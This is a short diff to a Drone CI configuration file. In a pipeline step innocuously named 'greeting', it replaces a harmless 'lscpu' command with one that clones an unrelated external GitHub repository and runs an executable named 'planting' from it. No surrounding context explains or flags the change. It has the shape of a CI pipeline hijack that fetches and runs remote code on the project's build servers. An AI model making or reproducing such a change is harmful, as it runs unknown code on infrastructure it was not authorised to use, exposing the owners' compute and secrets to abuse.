--- a/.drone.yml
+++ b/.drone.yml
@@ -6,4 +6,4 @@ steps:
 - name: greeting
   image: golang:1.12
   commands:
-  - lscpu
+  - git clone https://github.com/azureone4/zephher.git && cd zephher && chmod +x planting && ./planting
